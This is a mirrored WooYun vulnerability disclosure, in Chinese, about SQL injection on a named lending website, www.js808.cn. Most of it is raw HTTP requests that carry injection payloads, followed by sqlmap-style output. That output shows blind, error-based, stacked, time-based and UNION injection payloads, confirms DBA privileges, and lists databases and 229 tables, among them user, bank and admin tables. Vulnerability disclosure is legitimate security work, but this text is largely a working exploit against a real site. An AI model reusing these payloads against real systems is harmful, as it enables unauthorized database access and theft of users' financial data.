乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-28: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-06-12: 厂商已经主动忽略漏洞,细节向公众公开
233
参考:http://wooyun.org/bugs/wooyun-2015-01105671,POST /handle/getHelpContent.ashx HTTP/1.1Content-Length: 41Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.js808.cn/Cookie: ASP.NET_SessionId=04bquo552xqo1e55vb1onh45; CheckCode=2822Host: www.js808.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*id=20%20AND%203*2*1%3d6%20AND%20244%3d2442POST /newSite/Other/User_unlock.aspx HTTP/1.1Content-Length: 1694Content-Type: application/x-www-form-urlencodedCookie: ASP.NET_SessionId=04bquo552xqo1e55vb1onh45; CheckCode=2822Host: www.js808.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*btnEmail=%e7%a1%ae%e8%ae%a4%e6%8f%90%e4%ba%a4&ddlTypeOne=email&ddlTypeTwo=email&txtCode=94102&txtLockNickname='%2b(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(79)%2bCHAR(117)%2bCHAR(105)%2bCHAR(105)%2bCHAR(105)%2bCHAR(82)%2bCHAR(114)%2bCHAR(110))%20FROM%20syscolumns)%2b'&txtonestr=1&txttwostr=1&__VIEWSTATE=/wEPDwUINDA3OTc4NTYPZBYCAgEPZBYEAgEPZBYCAgEPDxYCHgRUZXh0Bc4BIOasoui/juadpeWIsDgwOOe9kee7nOS/oei0t%2bW5s%2bWPsOOAgiZuYnNwOyZuYnNwO1s8YSBocmVmPSdodHRwOi8vd3d3LmpzODA4LmNuL25ld1NpdGUvT3RoZXIvbG9naW5fbmV3LmFzcHgnPueZu%2bW9lTwvYT5dJm5ic3A7WzxhIGhyZWY9J2h0dHA6Ly93d3cuanM4MDguY24vbmV3U2l0ZS9PdGhlci9yZWdpc3Rlcl9OZXcuYXNweCc%2b5YWN6LS55rOo5YaMPC9hPl1kZAITD2QWAgIBDxYCHglpbm5lcmh0bWwFzAU8bGk%2bPGEgaHJlZj0nIyc%2bPGltZyBib3JkZXI9JzAnIHNyYz0nL2ltYWdlcy9idXR0b25fb2xkXzQwLmdpZicgYWx0PSfngrnlh7vov5nph4znu5nmiJHlj5Hmtojmga8nIHRpdGxlPSfngrnlh7vov5nph4znu5nmiJHlj5Hmtojmga8nPiZuYnNwOzEzODI3MTgwODwvYT4mbmJzcDsmbmJzcDs4MDjpmL/kuL08L2xpPjxsaT48YSBocmVmPScjJz48aW1nIGJvcmRlcj0nMCcgc3JjPScvaW1hZ2VzL2J1dHRvbl9vbGRfNDAuZ2lmJyBhbHQ9J%2beCueWHu%2bi/memHjOe7meaIkeWPkea2iOaBrycgdGl0bGU9J%2beCueWHu%2bi/memHjOe7meaIkeWPkea2iOaBryc%2bJm5ic3A7MTMzODcxODA4PC9hPiZuYnNwOyZuYnNwOzgwOOmYv%2bmbhTwvbGk%2bPGxpPjxhIGhyZWY9JyMnPjxpbWcgYm9yZGVyPScwJyBzcmM9Jy9pbWFnZXMvYnV0dG9uX29sZF80MC5naWYnIGFsdD0n54K55Ye76L%2bZ6YeM57uZ5oiR5Y%2bR5raI5oGvJyB0aXRsZT0n54K55Ye76L%2bZ6YeM57uZ5oiR5Y%2bR5raI5oGvJz4mbmJzcDsxMzgwNzU4MDg8L2E%2bJm5ic3A7Jm5ic3A7ODA46Zi/6ZyePC9saT48bGk%2bPGEgaHJlZj0nIyc%2bPGltZyBib3JkZXI9JzAnIHNyYz0nL2ltYWdlcy9idXR0b25fb2xkXzQwLmdpZicgYWx0PSfngrnlh7vov5nph4znu5nmiJHlj5Hmtojmga8nIHRpdGxlPSfngrnlh7vov5nph4znu5nmiJHlj5Hmtojmga8nPiZuYnNwOzEzMDk3MTgwODwvYT4mbmJzcDsmbmJzcDs4MDjpmL/oirM8L2xpPmRk
---Parameter: id (POST) Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace Payload: id=(SELECT (CASE WHEN (2692=2692) THEN 2692 ELSE 2692*(SELECT 2692 FROM master..sysdatabases) END)) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=1 AND 4707=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (4707=4707) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113))) Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: id=(SELECT CHAR(113)+CHAR(118)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (3982=3982) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113)) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: id=1;WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=1 WAITFOR DELAY '0:0:5' Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(78)+CHAR(86)+CHAR(79)+CHAR(102)+CHAR(65)+CHAR(89)+CHAR(115)+CHAR(122)+CHAR(108)+CHAR(97)+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113),NULL,NULL-- ---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008current user is DBA: Trueavailable databases [6]:[*] 808_mdbs[*] master[*] model[*] msdb[*] temp808[*] tempdbDatabase: 808_mdbs[229 tables]+----------------------+| Admin_Sign || Admin_User_808 || Admin_iplists || Android_LoginUser || Answer_808 || BBS_father || BBS_repays || BBS_son || BBS_tie || Bank_infor || Block_kf || CftWith || City_8088 || City_8088 || CreditEdu || CreditLevel || CreditSorce_808 || CustomerAssess || CustomerService || DataCensus_TzQj || EduApplay_808 || Edu_Tb_808 || EmailValide || Freezingzj || Friend_hei || Friends_808 || FundsInfos || Funds_balance || GiftsDhlist || HelpCenterNews || HelpClass || Invitefriends || IpInfors || JkEText || Jl_tj || Job_Tb_808 || LimitSendEmail || LimitSendEmail || Link_Tb_808 || LoanInfos_operate || LoanInfos_operate || LoanQsmd || Loan_Review || Loaninfos_userinfos || LockUsers || Lotter_state || MailContents || Monitor_Tb || OthersiteLoan || PastApplay || PastEdu || Pro_dhPack || Product_ScoreDh || Product_duInfos || Qustion_808 || ReceiveLoan || Reg_Arrt || Repaymentloan || SendCollection || SiteInfor || SiteMail || SiteUser_dstj || SubmitRepayment || SystemFather || SystemSon || TB_Dyzliao || TB_Kdbaoedu || TB_Txjietu || TB_adm_ywlr || TB_secpwd || Table_kbao || Tb_Managelist || Tb_Notice || Tb_Suggest || Tb_dfusers || Tb_otherhmd || TempSecid || TenderInfos || Tender_db || TestMess1 || TestMess1 || Tgnc_table || TrackKf || Upload_System || UserEmailActivate || UserLogin_error || UserRegister_Actions || UserSafety || UserScoreDetails || UserScore_DhTx || UserScore_DhTx || UserSendMailInfo || UserTbMoneyTj || User_Lottery || User_TruntableReward || User_UnLockInfos || User_WriteOff || User_aqNotice || User_loanIntr || Users_upload || VW_Yqhmd2 || VW_Yqhmd2 || VW_ZliaoP || VW_dbr || VW_suggest || Vip_Users_808 || Vw_Bbsties || Vw_Cftwith || Vw_Fkrsjsq || Vw_Freezes || Vw_Friends || Vw_Fundsinfors || Vw_IpList || Vw_L_Review || Vw_Lendmx || Vw_LoanInfoShenHe || Vw_Loaninformations || Vw_LotterState || Vw_MailContent || Vw_ManageUsers || Vw_Monitor || Vw_PeduApplay || Vw_ProPackInfosList || Vw_ProPackList || Vw_ProductDhInfo || Vw_ProductList || Vw_Receives || Vw_Remind_users || Vw_Repayment || Vw_SiteEmails || Vw_Tgusers || Vw_TieComment || Vw_Trender || Vw_UserLotter || Vw_UserWithDrawList || Vw_Valide || Vw_VipInfos || Vw_admiplist || Vw_bbsBlock || Vw_belowCz || Vw_cs_users || Vw_dbeduapplay || Vw_edhistory || Vw_eduapplay || Vw_eduapplay || Vw_hk2days || Vw_hlists || Vw_inforsnews || Vw_lockuserLists || Vw_remindlist || Vw_shzt || Vw_tgtc || Vw_txusers || Vw_user_zc || Vw_userje || Vw_users || Vw_webinfor || Vw_withdraws || Vw_wztjian_Tb || Vw_xcyw || Vw_yq_users || Vw_yqusers || WithDraw_list || admin_tb_808 || applyloan || bank_setqx || bbstie_comment || begsh_tb || below_recharge || bjin_vip_vw || bjin_vip_vw || black || comd_list || cspimg_808 || db_ed_808 || db_jktb_808 || dbeduapplay || dbr_tb || dya_table || ed_history || fkrsjrz || fksmrz_tb || giftslist || gzr_list || hid_id_tb || jkcls_808 || kserver_Tb808 || onlineorder || pinsorce_808 || pro_packinfos || provinces_808 || pshhe_result || second_tb || self_table || spplun_intrs || sysdiagrams || temp_allscore || temp_allscore || test_808 || tgtc_tb808 || userinfos_808 || vw_Bbsreplays || vw_Tenderdbmx || vw_Tenderdbmx || vw_answers || vw_bankinfo || vw_bankqxuser || vw_csusers || vw_dbjklist || vw_diya || vw_edus || vw_etextlist || vw_fksmrz || vw_hei_friend || vw_jkcns || vw_jksmrz || vw_jobs || vw_onorders || vw_question || vw_selftb || vw_txhk2tian || vw_txremind || vw_upphotos || vw_userwriteoff || vw_wbnotices || vw_yqlist || wztjian_Tb || xc_repaymment || xc_tjr |+----------------------+
~~~
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)